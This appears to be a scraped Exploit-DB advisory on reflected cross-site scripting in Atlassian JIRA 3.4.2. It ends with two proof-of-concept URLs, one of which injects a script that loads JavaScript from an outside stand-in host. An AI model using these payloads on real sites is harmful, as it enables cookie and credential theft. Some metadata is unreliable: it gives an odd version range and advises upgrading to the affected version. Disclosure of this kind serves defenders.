Multiple Cross-Site Scripting Vulnerabilities in Atlassian JIRA

vendor:

JIRA

by:

Not provided

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: JIRA

Affected Version From: Prior versions to 3.4.2

Affected Version To: 3.4.2002

Patch Exists: YES

Related CWE: Not provided

CPE: a:atlassian:jira:3.4.2

Metasploit:

Other Scripts:

Platforms Tested:

2007

Multiple Cross-Site Scripting Vulnerabilities in Atlassian JIRA

The Atlassian JIRA application fails to properly sanitize user-supplied input, leading to multiple cross-site scripting vulnerabilities. An attacker can exploit this by injecting arbitrary script code into the browser of a victim user, allowing them to steal authentication credentials and launch further attacks.

Mitigation:

Atlassian JIRA users should upgrade to version 3.4.2 or later to mitigate these vulnerabilities. It is also recommended to sanitize user input to prevent XSS attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23244/info

Atlassian JIRA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Version 3.4.2 is affected; prior versions may also be vulnerable. 

http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><script>alert("xss");</script
http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><scriptsrc=http://www.example2.com/re.js></script>